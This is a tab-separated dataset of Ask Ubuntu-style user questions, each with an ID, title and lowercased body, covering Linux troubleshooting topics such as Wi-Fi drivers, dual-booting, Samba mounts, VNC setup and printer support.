415069	forbidden error 403 when accessing site using nginx	i am running a node web app which is accessed via a url . when i go to the url i get the following message : directory index of `` /var/www/mydomain/public_html/app/views/ '' is forbidden , client : x.xx.x.x , server : domainname , request : `` get / http/1.1 '' , host : `` domainname '' the permission are as below : drwxr-xr-x root root / drwxr-xr-x root root var drwxr-xr-x root root www drwxrwxrwx root root domain.com drwxrwxrwx root root public_html drwxrwxrwx tej tej app drwxrwxrwx tej tej views any ideas of how i can resolve this ?
415071	is there a non-safari alternative to clicktoflash/clicktoplugin ?	there is a great plugin for safari i use on my mac that not only prevents flash from automatically loading , but it also allows you to instantly convert any flash video stream into html5 . even better , it lets you download the video with a simple right click ! so not only does it skip all the ads on youtube , allows downloading of different video qualities , speeds up browsing , and reduces dependance on flash , it also replaces ugly video players with a simple unobtrusive version . this plugin is definitely in my top 5 most-missed mac-only programs and if anyone could suggest a viable alternative for a linux web browser it would be much appreciated . http : //hoyois.github.io/safariextensions/clicktoplugin/
415074	why ca n't pgrep find a process ?	consider : $ ps -ef | grep myprocess root 7204 1 99 23:37 ? 00:02:36 ./myprocess drew 7439 7266 0 23:38 pts/0 00:00:00 grep myprocess $ pgrep myprocess the process in question is a service controlled by upstart . why ca n't pgrep see this process ?
415084	is an internal hdd required to `` try ubuntu from disk '' ?	i have an old laptop ( thinkpad t60 4gb ram , intel duo core 2.16ghz cpu ) that does not have a hard drive in it . i want to test it out before buying a hard drive for it . i used pen drive usb installer to install ubuntu 13.10 , ubuntu 12.04 , and lubuntu 13.10 on separate usb ( 4gb ) drives and booted from them . then i tried them before installing . each on hangs . lubuntu got the furthest . it opened up to the desktop but then immediately froze . could this be a problem solved by installing a hard drive ? thanks ! edit : so as soon as i submitted this i found a similar quesion . it still does not answer what the problem might actually be . any help would still be appreciated .
415085	webcorpus in ubuntu	actually its working fine in windows but am getting error in ubuntu how can i get rid of this problem , thanks . library ( `` tm.plugin.webmining '' ) loading required package : tm loading required package : rcurl loading required package : bitops loading required package : xml loading required package : boilerpiper loading required package : rjava attaching package : ‘rjava’ the following object is masked from ‘package : rcurl’ : clone attaching package : ‘tm.plugin.webmining’ the following object is masked from ‘package : rcurl’ : geturl the following object is masked from ‘package : base’ : parse > library ( `` rjava '' ) > library ( `` boilerpiper '' ) > library ( `` namespace '' ) > yahoonews < - webcorpus ( yahoonewssource ( `` switzerland '' ) ) error in get ( name , envir = asnamespace ( pkg ) , inherits = false ) : object '.source ' not found
415091	is there a livecd ( not dvd ) for ubuntu 13.10 ?	i am working on a computer that does not have a dvd drive , and can read but not boot from usb . however , it does have internet access . is there any super minimalist version of ubuntu 13.10 that can be burned to a cd instead of a dvd , and then fetch anything still missing from the internet at runtime ?
415092	how can i set default limit on udp packet size in iptable rule ?	i need this specifically for avoid attack on server .
415093	transferring ubuntu from one hdd to another	so basically , i just got lubuntu back , but the partition is on my music hdd , not my os hdd ( both old 40gb : p ) . is there any way that i can transfer the dual boot to my os hdd ?
415096	my ubuntu files/folders disappears	i have set up several ubuntu machines and when i go to try and power on , they give me an error message : file not found : sans sift 12.04lts x64-snapshot.vmsn this file is required to power on this virtual machine . if it was moved , specify the new location . i also get the message : could not open virtual machine : c : \users\nicole\documents\virtual machines\cyb652win7sp1 x32\cyb652win7sp1 x32.vmx file not found . and on another machine : could not open virtual machine : c : \users\nicole\desktop\last time\windows 7.vmx file not found . where are these disappearing to ? when i go to the folder where these are actually stored , and click on it , they indicate : error while opening the virtual machine : vmx file is corrupt . please help as i a only a beginner and have no idea what i am doing to make this happen ! !
415098	make iso of disc with certain locations and directory	i 'm having a hard time . i 'm trying to make iso 's of some discs . brasero defaults to my home drive , which has insufficient space , so it dims the the properties button , thus making impossible to change the destination . faaaaaantastic . i 've tried using mkisofs ad genisoimage , but they both yield the same error , both at 1.15 % : haephestus @ andromaeda : ~ $ genisoimage -r -j -o /media/wntr/cinema/pacific_rim.iso /media/pacific_rim/ i : -input-charset not specified , using utf-8 ( detected in locale settings ) 0.14 % done , estimate finish mon feb 3 17:10:46 2014 0.29 % done , estimate finish mon feb 3 17:10:48 2014 0.43 % done , estimate finish mon feb 3 17:06:56 2014 0.58 % done , estimate finish mon feb 3 17:07:55 2014 0.72 % done , estimate finish mon feb 3 17:06:10 2014 0.86 % done , estimate finish mon feb 3 17:05:01 2014 1.01 % done , estimate finish mon feb 3 17:05:50 2014 1.15 % done , estimate finish mon feb 3 17:05:01 2014 genisoimage : input/output error . can not read from '/media/pacific_rim/video_ts/vts_01_0.vob' haephestus @ andromaeda : ~ $ any ideas ? thank you , asldkfjasdl ; k
415099	13.10 network epson printer stuck on `` installing ''	i just installed ubuntu 13.10 , and i ca n't configure my wi-fi epson tx430w printer . using the settings- > printers interface , i can detect the printer . when i click add , i briefly see a `` searching for drivers '' dialog . it dissapears , and then i 'm left with the printer forever in `` installing '' status . if i close the window and reopen printers , it does n't show up on the list . how can i solve , or at least diagnose the problem ?
415102	can not install ubuntu alongside windows 7	i have divided my 500gb on my vaio into 4 partitions : system reserved , c , d and e for win7 . when i want to install ubuntu , it seems like that ubuntu can not understand that my laptop have already win7 on it ( there is no option `` install alongside with win7 ) . the biggest problem is that ubuntu said that my 500gb is unallocated so that i need to allocated it to install . however , when i check with hirenboot or window disk management , it 's said that my 500gb is divided in 4 partitions already . how can i solve this problem to install ubuntu ?
415104	two users - how do i automount a samba share for one user but not the other ?	tldr : i want to configure a box that is running ubuntu desktop and has two users so that it automounts a password protected samba share when one user logs in , and does n't when the other logs in . long version on my home network , i have two boxes : one runs ubuntu desktop , and the other is my file server that contains two password-protected samba shares ( no guest access ) . users and accounts : there are two users , bob and jane . bob and jane both have their own separate usernames and passwords in all three places ( i.e . separate unix accounts on the desktop and file server , and separate samba accounts ) . samba shares : the file server has two samba shares , secrets and shared . secrets is configured so that bob is the only user who can connect to it ( in smb.conf under [ secrets ] , write list = bob , guest ok = no , etc ) . my question is n't about how to configure the samba share ( sorry this is taking so long to set up my question ) . auto mounting the samba shares : when bob logs into the ubuntu desktop , secrets is automounted using bob 's own samba creds , nautilus displays secrets as one of the places under `` computer '' in the left hand nav bar so he can get to it without lifting a finger , the files and folders under that share display as being owned by bob ( ls -l /media/secrets ) , and the file permissions display as -rw -- -- -- - and folder permissions as drwx -- -- -- . this i 've accomplished by adding the following to my /etc/fstab with the separate file that contains bob 's samba creds . //centaroo.local/secrets /media/secrets cifs uid=bob , gid=bob , credentials=/home/bob/.smbcredentials , iocharset=utf8 , sec=ntlm , file_mode=0600 , dir_mode=0700 0 0 here 's the problem , and here comes my question : when jane logs in , she , too , sees the label `` secrets '' displayed prominently in the left hand nav bar in nautilus , which is not the end of the world because she still gets access denied when she tries to click on it , but i 'd prefer if she did n't even see the secrets share in nautilus . in other words , i want to change the settings somehow so that when jane logs in , she does n't even know secrets is there , it does n't attempt to automount , etc . how do i do this ? since i want to automount secrets for one user and not the other , is fstab the wrong way ? is it time for me to look into autofs , or is there a way to do what i want ? i 've followed instructions for mounting windows shares permanently and glanced over documentation on autofs , but i 'm not clear whether autofs is the answer . if anyone can point me in the right direction , i 'd really appreciate it . also , if there 's any extra info that you need in order to help me , please indicate so in the comments . thanks !
415108	how to map /dev/mapper	my actual lvm 's are like : 1.lv name /dev/volgroup/lv_root vg name volgroup 2.lv name /dev/volgroup/lv_swap vg name volgroup but in the df -kh output , it show under /dev/mapper : /dev/mapper/volgroup-lv_root 187g 27g 151g 16 % / if i want to create it manually , how do i map lvm /dev/volgroup/lv_root under /dev/mapper . so that after that , it will show like /dev/mapper/volgroup-lv_root ?
415112	booting ubuntu from usb drive fails with message `kernel panic not syncing`	i 'm trying to run ubuntu from a usb drive . when i boot the computer , i get a bunch of messages . the last message is something like kernel panic not syncing attempted to kill init booting i am using an msi 970-43a motherboard . i read something about enabling iommu , but i ca n't seem to find that option in the bios . this is my first time using linux , so i do n't really know too much on how to troubleshoot this issue .
415113	how to get ascii ubuntu logo in terminal	i was on some linux forum the other day on my phone and people where screen dumping using terminal and everyone had ascii art of their computers they typed something like `` screenfetch '' or something i do n't remember .
415115	installing 13.10 alongside preinstalled windows 8	i followed this guide to a t : http : //www.everydaylinuxuser.com/2013/09/install-ubuntu-linux-alongside-windows.html however , when i get to step 6 , i just see my /dev/sda and it says it 's completely unallocated . i could just select /dev/sda and click install now , but would n't that kill my windows installation ? quitting the installation and just running ubuntu from the liveusb , gparted says the whole drive is unallocated and says i have a corrupt or invalid gpt table . using the disks utility , i can see all of my partitions , including the free space i created . running fdisk says : partition 1 does not start on physical sector boundary , and does n't list any partitions . i have already read through every related post on here and none of it works . is there not some simple way to tell ubuntu to play nice with the way windows 8 partitions the hard drive ? if there is n't a straightforward answer to this , i am abandoning the idea of ever using linux outside of a work environment . something with so much support and so many well-versed users should not be so difficult . edit : here is what i get from gdisk : ubuntu @ ubuntu : ~ $ sudo gdisk /dev/sda gpt fdisk ( gdisk ) version 0.8.7 caution : invalid backup gpt header , but valid main header ; regenerating backup header from main header . partition table scan : mbr : protective bsd : not present apm : not present gpt : damaged **************************************************************************** caution : found protective or hybrid mbr and corrupt gpt . using gpt , but disk verification and recovery are strongly recommended . **************************************************************************** warning ! secondary partition table overlaps the last partition by 1 blocks ! try reducing the partition table size by 4 entries . ( use the 's ' item on the experts ' menu . )
415119	where can i find the old wifi drivers ?	something happened and i have to load another ubuntu onto my computer . so i 'm using the alternate installer for 12.04lts ( the same as before ) but unfortuantely , i do n't have the wifi driver i need.. the only one my wifi card will take is the : iwlwifi-7260-6.ucode the 6 , not the 7 or 8 which is currently offered.. the six works , both the others do n't even they 're newer.. the card i have is the intel wireless 7260 ac the install disk wo n't even take the others.. anyone know where i can get this ? i wrote on this subject in a past ask ubuntu and this is what i figured out which works , unfortunately it worked and stopped working after i played with the `` advanced settings '' app to try to permanently get rid of the bluetooth program running on ubuntu which i did n't want cause i do n't seem to have any bluetooth devices
415120	ubuntu 12.04 searched the net still ca n't see windows shares	not only can samba not find the shares , the windows xp vm machine inside of ubuntu ca n't even see the windows shares . getting annoyed cuz i 'm not finding any real answers here for the average person , just a lot of people guessing . and i do n't need a guess , i need an answer here cuz if not i 'll have to dump ubuntu for windows again just to get access to my 6 tb storage areas . sambas there , everythings reporting correctly , nadda , ca n't access the network shares . set to the same ip pool , same workgroup , there is no password on the network shares and there is no firewall . the vm machine is getting an ip address that matches the network but of course , no network even there . i 'm not wanting windows to see this machine , i need this machine to see the 3 windows machines already there . its not even complicated like a windows 7 or nothing , its a strictly xp network . the other machines ca n't even see the vm machine and i 've been to hell and back trying to get an `` answer '' answer not just a guess and a closed thread . and i 'm not installing any more crap in here until someone can give me a real answer , probably corrupted the core downloading all these `` suggestions '' already ... .
415121	how do i get league of legends working properly on ubuntu ?	i can install and get league running on 12.04 and 13.10 , but i get 2-5 fps , the screen is mostly black ( i can see just the hud and player and enemy health bars , the rest is black/silhouettes ) and my menus are red boxes that are hard to see . how do i fix this ? i installed both through a .sh boot file and through playonlinux , and both ways give me the same issues .
415122	how to set nano default syntax highlighting for files with no extension ?	i 'm trying to set a 'default ' syntax highlighting scheme for nano when i 'm editing files with no extension such as /etc/nginx/sites-available/default or /etc/ssh/sshd_config but i ca n't seem to make it work . i 've copied the c syntax highlighting file into /usr/share/nano/default.nanorc and then added include `` /usr/share/nano/deafult.nanorc '' to my ~/.nanorc file but i 'm still not getting highlighting for files with no extension . anyone know how to enable this ?
415124	tmux and keyboard bindings	the following are some of the keyboard bindings for tmux : ctrl-b c create new window ctrl-b d detach current client ctrl-b l move to previously selected window ctrl-b n move to the next window ctrl-b p move to the previous window ctrl-b & kill the current window ctrl-b , rename the current window ctrl-b % split the current window into two panes ctrl-b q show pane numbers ( used to switch between panes ) ctrl-b o switch to the next pane ctrl-b ? list all keybindings holding down control+b and then pressing d successfully detaches from current tmux session . control+b and then pressing , allows me to rename the window however , none of the other options are doing anything for me . for example , control+b and then pressing c does not create a new window . control + b and then pressing ? does not list the keybindings . i am using tmux : 1.6-1ubuntu1 . is the documentation i am looking at out of date ?
415127	adblock on chromium 32.0.1700.102 vs chrome 32.0.1700.107	as of a few days ago , the adblock extension in chromium will no longer block ads on youtube . i tested chrome 32.0.1700.107 and it is able to block the ads using the same extension . is there a workaround for chromium 32.0.1700.102 ? using xubuntu 13.10 .
415128	visual artifacts , slow performance , amd hardware accel	i finally got grub working and am now having some problems with ubuntu 13.10 . when i move my mouse i see visual artifacts , such as the mouse being left behind and copied , squares moving around and with the mouse , black boxes when scrolling a web page , etc . i am getting very low fps and lag , writing this text takes a few seconds to show up . when i ran the opengl info , it listed my haswell cpu for the gfx accelerator instead of my amd radeon hd 7950 . this may be because i tried twice to update the driver to the proprietary one via the `` system settings > software and updates '' menu and both times i lost connection to my monitor , got a blank purple screen on reboot , and had to start in recovery mode and run remove fglrx . even using my 4770k for gfx , i do n't think i should be getting this much delay and low fps . lastly , a report error dialog frequently prompts me to send a crash report about action : com.ubuntu.apport.apport-gtx-root | vendor : apport thanks .
415132	volume pop-up asset name	i am trying to change the colour of the volume pop-up and any other like it , i am running cinnamon atm but also have gnome installed . is it possible to change via theme ? if so is it in the gnome/cinnamon.css somewhere ? i tried a ton of stuff but nothing changed it . though i assume it is a png somewhere , i just do n't know where . any help would be much appreciated . -hunter
415137	remote control : too much output	i use an x10 remote control and dongle on ubuntu 12.04 , loaded on a dell latitude 430 , and have been happily mapping the output to keys with no problem at all . lirc is loaded and i use irxevent -d to fine tune everything no problem . i use kaffiene and can get the remote to work , just a bit too well . if i want to change channels to say , channel 1 , the output is always 111 pressing channel 2 gives channel 222 etc . is there something i can alter to get bbc one again and not al jazeerah every time i press 1 on the remote . yours in eager anticipation , fitch
415138	anybody know where i can find iwlwifi-7260-6.ucode ?	i need this file and this file only , and i 'm wondering if there 's anyone out there who knows where i can find this . my 7260 card and ubuntu 12.04 alternate installer will only take this file and this file only to get the wifi working , i 've done this already . the two new ones just simply do n't work for the card . does anyone know where i can get this file from ? the iwlwifi - linux drivers and intel 's site for linux drivers does n't have it either
415141	virus detected with clamtk ( possible infection ? )	i did a routine scan of my system , with clamtk . the the anti-virus reported 3 detections . the names of the three detections are : 1 . [ pua.phishing.bank ] 2 . [ pua.phishing.bank ] 3 . [ pua.script.packed-1 ] the first two are detected in the firefox caches : /.cache/mozilla/firefox/ the last is detected in the chromium caches : /.cache/chromium/default i know that pua stands for potentially unwanted software . are these false positives ? is it a windows virus or a linux virus ? if it is a linux virus , how will it affect my system ?
415142	wifi constantly dropping at univeristy	i have a lenovo thinkpad t440s with the intel 7620 ac card . i 'm running ubuntu 13.10 and while i 'm at school my wifi drops constantly . i do n't experience this issue when i 'm in windows . i was wondering if anyone knows of a fix to this as it 's quite annoying .
415144	trouble downloading matlab r2011a	so im new to ubuntu from windows and am trying to re download matlab onto my computer . i have used both the java downloader and tried to download it manually with the terminal , but each time when i go to install it , the matlab box pops up for a second and then disappears . can anyone help me get the installer to work ?
415145	can i make this keyboard light command that requires sudo run at startup ?	my laptop has a light under the keyboard . i doubt the keyboard light consumes a lot of power , but when it comes to laptops and batteries , every little bit helps . so i prefer it to default to being off . i found this command that i can run at the command line which switches off the keyboard light : echo 0 | sudo tee /sys/class/leds/asus : :kbd_backlight/brightness which is nice , but i 'd like to have it in my list of startup programs so that i do n't have to remember to turn off the keyboard light , which i often forget to do . however , it does n't seem to work if i put it in the startup applications , and i suspect that it could be because part of it requires sudo , so it probably does n't have the right persmissions at startup time . or maybe it 's another issue . in any case , it does n't run at startup . is there a way i can get this command to run at startup ?
415147	possible to get bcm propietary driver working with bcm4313 ?	please forgive me if there 's any answer out there and i just have n't found it . i 've been reading up on this topic quite a bit ( about a week , ) google , ubuntu bugs , askubuntu , you name it ... have already disabled this driver just so i could get the wifi to work . took a look and this is the one that comes pre-packaged with this distro ( i believe . ) usually i 'm pretty steadfast and try to do my homework as 99 % of the time others have hit the issue already , and created a workaround or solved it ... my current state -- i 've got the wireless working like probably a lot of ubuntu users out there . though i 'm not exactly thrilled with using the open source driver as it does n't support power management i do n't believe , ideally this is something i 'd like to take advantage of being very conservative and loving my extended battery life . my battery life in ubuntu right now is horrid compared to windows ( slowly working on that . ) i 've got a dell latitude e6430 , with an extended battery , so every last bit of power savings i can squeeze out of this the better , even if it means resorting to using broadcom 's already proving to be a pain.. driver . any insight , help , etc.. is greatly appreciated and if there 's anything else i can do to help please let me know . i 'm more than willing to dive into this and give any info needed , just let me know . http : //www.broadcom.com/support/802.11/linux_sta.php -- 6.30.223.141 here 's some basic info to start : some_user @ some_host : ~ $ lspci | grep wireless 03:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) some_user @ some_host : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' some_ssid '' mode : managed frequency:2.412 ghz access point : f8:1e : df : fa : b4 : a5 bit rate=28.9 mb/s tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=52/70 signal level=-58 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:24 invalid misc:63 missed beacon:0
415148	system shutdown during ubuntu upgrade from 12.04 to 12.10	my laptop lenovo v570 shutdown during the upgrade from 12.04 to 12.10 on rebooting , i saw the display was messed up with a max resolution of 1024x768 . also , no network interfaces are found except loopback lshw -c network : shows both the network controller ( centrino wireless-n + wimax 6150 ) and the ethernet controller ( rtl8111/8168b ) unclaimed . i can not connect to any wired/wireless network . i am not an expert with the ubuntu systems yet . please help ! !
415149	`` eth0 disconnected '' on plugged-in cable in ubuntu 12.04.3 server installation	i 'm trying to use the ubuntu 12.04.3 lts amd64 server installer on a system . i 'm doing a boot from a usb drive to the installer , but the installer environment seems unable to access the internet , so i ca n't get past selecting a mirror . i 've tried this in both uefi and regular modes with the same results . the /var/log/syslog from the busybox installer environment shows that it believes eth0 is disconnected . what 's interesting about that is that the switch port it 's attached to has both lights on and so does the motherboard side ! swapping switch ports , cables , bypassing the switch entirely all had no result . here 's when it finds the hardware and first starts looking for a link : feb 4 03:41:32 kernel : [ 9.244831 ] atl1c 0000:03:00.0 : irq 43 for msi/msi-x feb 4 03:41:32 kernel : [ 9.245396 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready feb 4 03:41:33 check-missing-firmware : /dev/.udev/firmware-missing does not exist , skipping feb 4 03:41:33 check-missing-firmware : /run/udev/firmware-missing does not exist , skipping feb 4 03:41:33 check-missing-firmware : no missing firmware in /dev/.udev/firmware-missing /run/udev/firmware-missing feb 4 03:41:33 main-menu [ 391 ] : debug : resolver ( libc6-udeb ) : package does n't exist ( ignored ) feb 4 03:41:33 main-menu [ 391 ] : debug : resolver ( libnewt0.52 ) : package does n't exist ( ignored ) feb 4 03:41:33 main-menu [ 391 ] : info : menu item 'netcfg ' selected feb 4 03:41:33 main-menu [ 391 ] : info : falling back to the package description for crypto-modules-3.8.0-29-generic-di feb 4 03:41:33 main-menu [ 391 ] : info : falling back to the package description for crypto-modules-3.8.0-29-generic-di feb 4 03:41:33 netcfg [ 2369 ] : info : starting netcfg v.1.68ubuntu14 ( built 20120309-1721 ) feb 4 03:41:33 netcfg [ 2369 ] : warning ** : could n't read wpasupplicant pid file , not trying to kill . feb 4 03:41:33 netcfg [ 2369 ] : debug : flushing addresses and routes on interface : eth0 feb 4 03:41:33 netcfg [ 2369 ] : info : could not find valid bootif= entry in /proc/cmdline feb 4 03:41:33 netcfg [ 2369 ] : debug : state is now 0 feb 4 03:41:33 netcfg [ 2369 ] : debug : want link on eth0 feb 4 03:41:33 kernel : [ 10.337143 ] atl1c 0000:03:00.0 : irq 43 for msi/msi-x feb 4 03:41:33 kernel : [ 10.337289 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready feb 4 03:41:34 netcfg [ 2369 ] : info : ethtool-lite : eth0 is disconnected . # snipped out 11 more repetitions of previous line feb 4 03:41:36 netcfg [ 2369 ] : debug : commencing network autoconfiguration on eth0 feb 4 03:41:36 netcfg [ 2369 ] : debug : rdnssd started ; pid : 2392 feb 4 03:41:37 netcfg [ 2369 ] : debug : nc_v6_interface_configured ( eth0 , scope local ) feb 4 03:41:37 netcfg [ 2369 ] : debug : running ip addr show eth0 to look for address feb 4 03:41:37 netcfg [ 2369 ] : debug : ip line : 2 : eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down qlen 1000 feb 4 03:41:37 netcfg [ 2369 ] : debug : ip line : link/ether 00:25:22 : b6 : e3:73 brd ff : ff : ff : ff : ff : ff feb 4 03:41:37 netcfg [ 2369 ] : debug : nc_v6_interface_configured ( eth0 , scope local ) # snipped out this cycle repeating a bunch more , it 's just ip addr show eth0 's unchanging output feb 4 03:41:39 netcfg [ 2369 ] : info : no ipv6 support found ... how does that happen ? feb 4 03:41:39 netcfg [ 2369 ] : debug : stopping rdnssd , pid 2392 feb 4 03:41:39 netcfg [ 2369 ] : debug : no ra received ; attempting ipv4 autoconfig then it does a bunch of unimportant dhcp stuff - obviously it all fails since it 's `` disconnected '' . mostly what i took away from this is that the kernel module that matched my hardware was atl1c , and it did n't work , so i looked the module up . i found a lot of complaints about bugginess , and then i found that it was experimental in the 3.8 kernel the installer runs . booting into the ubuntu desktop installer i was able to connect with ease , both with dhcp and static addressing . i 'm not sure what i can even do to solve this issue . how can i install 12.04.3 server on this system ? is this a known issue with some sort of work-around ? can i poke something , blacklist some driver , add some parameters to the grub boot ? if i ca n't , is the best route to install the desktop version and then remove all the extra packages i do n't want ? the busybox environment in the installer seems too limited to accomplish much of anything .
416149	firewall activation process	how do i activate my firewall through the terminal and is it necessary or done automatic . my regards team ! thmoabw
416150	seagate portable hard disk fails in ubuntu 13.10	i have a seagate expansion portable hard disk . it worked well in windows-based systems ( xp , win7 ... ) . when i tried to connect it to a ubuntu machine , it also worked well -- but just several seconds or minutes . after a while , the ubuntu machine was unable to read anything from it . here 's the related dmesg output : [ 12.338979 ] usb 1-5 : new high-speed usb device number 4 using ehci-pci [ 12.472290 ] usb 1-5 : new usb device found , idvendor=0bc2 , idproduct=2101 [ 12.472369 ] usb 1-5 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 12.472444 ] usb 1-5 : product : parotable [ 12.472512 ] usb 1-5 : manufacturer : seagate [ 12.472580 ] usb 1-5 : serialnumber : 00a123456c21 [ 13.729332 ] scsi 4:0:0:0 : direct-access seagate parotable 0114 pq : 0 ansi : 6 [ 13.730468 ] sd 4:0:0:0 : attached scsi generic sg1 type 0 [ 13.732680 ] sd 4:0:0:0 : [ sdb ] 1953525168 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 13.733770 ] sd 4:0:0:0 : [ sdb ] write protect is off [ 13.733790 ] sd 4:0:0:0 : [ sdb ] mode sense : 47 00 10 08 [ 13.734870 ] sd 4:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , supports dpo and fua -- -- -- then i mounted an ext3 partition , after a while ... -- -- -- [ 69.011949 ] sd 4:0:0:0 : [ sdb ] invalid command failure [ 69.011961 ] sd 4:0:0:0 : [ sdb ] [ 69.011966 ] result : hostbyte=did_ok driverbyte=driver_sense [ 69.011972 ] sd 4:0:0:0 : [ sdb ] [ 69.011977 ] sense key : illegal request [ current ] [ 69.011985 ] sd 4:0:0:0 : [ sdb ] [ 69.011991 ] add . sense : invalid field in cdb [ 69.011998 ] sd 4:0:0:0 : [ sdb ] cdb : [ 69.012002 ] write ( 10 ) : 2a 08 1d 83 d0 28 00 00 08 00 [ 69.012022 ] end_request : critical target error , dev sdb , sector 495177768 [ 69.012032 ] end_request : critical target error , dev sdb , sector 495177768 [ 69.012039 ] buffer i/o error on device sdb1 , logical block 66053 [ 69.012044 ] lost page write due to i/o error on sdb1 [ 69.012072 ] aborting journal on device sdb1 . it seemed likes a hardware problem . so i have the hdd checked in windows using various tools ( hd tune , chkdsk , etc . ) . each of them reported no errors . it still works well in windows . this made me very confused ... here 's its partition table ( mbr ) : 1 . 235.87gb primary fat32 2 . 1023mb primary ext3 active ( prepared to be the /boot for my portable linux , but ... : - ( ) 3 . < extended > 3.1 578.06gb logical ntfs 3.2 69.49gb logical no filesystem 3.3 46.07gb logical luks with ntfs ( created by a windows utility named freeotfe ) 3.4 1.03gb logical no filesystem ( sorry for my bad english ... ) anyone can help ? thank you very much .
416151	tight vnc server , ubutu 12.10 and unity desktop	i 've done the following but all i get in vnc viewer is a blank orange screen , any help appreciated . apt-get -y install ubuntu-desktop tightvncserver adduser vnc passwd vnc echo `` vnc all= ( all ) all '' > > /etc/sudoers su - vnc vncpasswd exit cd ~ nano .vnc/xstartup # ! /bin/sh # uncomment the following two lines for normal desktop : unset session_manager . /etc/x11/xinit/xinitrc [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 1280x1024+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager & save then nano /etc/init.d/vncserver then paste in the following , then save : # ! /bin/sh -e # # # begin init info # provides : vncserver # required-start : networking # default-start : 3 4 5 # default-stop : 0 6 # # # end init info path= '' $ path : /usr/bin/ '' # the username : group that will run vnc export user= '' vnc '' # $ { runas } # the display that vnc will use display= '' 1 '' # color depth ( between 8 and 32 ) depth= '' 16 '' # the desktop geometry to use . # geometry= '' x '' # geometry= '' 800x600 '' geometry= '' 1024x768 '' # geometry= '' 1280x1024 '' # the name that the vnc desktop will have . name= '' my-vnc-server '' options= '' -name $ { name } -depth $ { depth } -geometry $ { geometry } : $ { display } '' . /lib/lsb/init-functions case `` $ 1 '' in start ) log_action_begin_msg `` starting vncserver for user ' $ { user } ' on localhost : $ { display } '' su $ { user } -c `` /usr/bin/vncserver $ { options } '' ; ; stop ) log_action_begin_msg `` stopping vncserver for user ' $ { user } ' on localhost : $ { display } '' su $ { user } -c `` /usr/bin/vncserver -kill : $ { display } '' ; ; restart ) $ 0 stop $ 0 start ; ; esac exit 0 then ctrl-x to save , y for yes , and enter to accept file name . then chown -r vnc . /home/vnc/.vnc & & chmod +x /home/vnc/.vnc/xstartup sed -i 's/allowed_users . */allowed_users=anybody/g ' /etc/x11/xwrapper.config then chmod +x /etc/init.d/vncserver & & service vncserver start then update-rc.d vncserver defaults then reboot . finally : go in there with tightvnc viewer client , and voila , blank kool aid tangerine orange screen . any help appreciated , of course it 's been 3 x 8 hour evenings so far : }
416153	is there a version of ubuntu 12.04 without unity ? i prefer gnome	i 'm still running 10.04 , and have been putting off upgrading because i do n't want to have to have unity . i prefer gnome , and want to keep using it . i do want to upgrade to another lts release , and 12.04 is the next one . is there a non-unity version of 12.04 ? a 12.04 version that still uses gnome ?
416154	bluetooth not working on dell vostro 2520 laptops ubuntu	i have dell vostro 2520 dual boot machine . on windos 7 my laptops bluetooth works fine but on ubuntu 12.04 bluetooth does n't work . it shows bluetooth icon but did not scan devices.. i tried installing this package bt-bcm43142-onereic_0.0+20111116somerville2_amd64.deb but still not working . sudo hcitool dev command shows my bluetooth device macid . but sudo hcitool scan command does n't scan devices..
416159	web control panel for kvm	i need web control panel for kvm that is compatible with ubuntu 12.04 or higher . solusvm , virtualizor is n't compatible with ubuntu .
416161	ubuntu terminal not exporting environment variable from .bashrc	i tried following ( read from stack exchange ) : added `` export ostype=linux '' in .profile but even then it shows `` echo $ ostype '' as linux-gnu
416163	how to enable .htaccess on ubuntu 13.10	i installed apache+mysql+php on my ubuntu 13.10 . i want to use customized .htaccess file . but it is disabled by default on ubuntu system . there are some tutorials on how to enable it on ubuntu 12.04 but there are no tutorial on how to enable it on ubuntu 13.10 . could anyone show me how to enable .htaccess on ubntu 13.10 ?
416165	can gcalccmd do currency conversion ?	any idea if this is actually supported or documented somewhere ? gcalccmd man is not being useful at all
416169	upstart instance job on system reboot	i am using upstart instance jobs to start few of my services . the jobs are meant to have one instance per user i.e they take in the user name as the instance parameter . i have also configured them to be respawned by upstart . the respawning works . here is what my config file looks like start on runlevel [ 2345 ] stop on runlevel [ 06 ] normal exit 0 respawn respawn limit 5 300 instance $ user chdir /home/talha/syncservice/ script exec python sync.py $ user end script the issue is that i want these instance jobs to be restarted on system reboot . obviously i can not pass in all the usernames as the instance parameters on reboot as i do not know what and how many instances were spawned last time . is there a way that upstart can persist its state tables for instance jobs across reboots . why i assume that there are some `` state table '' ? , is because i assume that upstart keeps a track of all the running instance jobs . there would be a state table that tracks which instance to respawn when it crashes . otherwise it wont be able to respawn an instance job . so if those tables can be made persistent across reboots my problem will be solved . can the persistence be somehow achieved. ? where does upstart keep the track of its running jobs ? is it only in memory or a file ? if that can not be done , that means that the stanza start on runlevel [ 2345 ] has no meaning or benefit for instance jobs .
416175	how to purchase a paid version of ubuntu to run wrf model	i am using ubuntu ( free desktop version ) for last 3 years to run meteorological model ( wrf/chem and wrf ) . recently i am try to use ubuntu 12.04 but it gives different type of problems . for example , when i try to install intel c++ and fortran and wrf model , it automatically shows system errors/bugs and computer become shutdown . after it can not be restarted . in this case my question is , if i purchase performance optimisation for games and apps , then the problem can be solved or not ? if i purchase it , do you have any warranty ? if i purchase it then how long can i use it ? do you have any customer service office in japan . if yes , please give me the contact address . sincerely yours khandakar habib al razi researcher
416179	epson l350 intank printer/scanner	i have one of the new epson intank series l350 and the printer itself installed fine on ubuntu , however even with drivers off epson 's support site , namely iscan-data and iscan-*ltd7 , i am not able to get the scanner working at all . it works on opensuse however . is there something that i am missing or need to install to get the scanner running properly ?
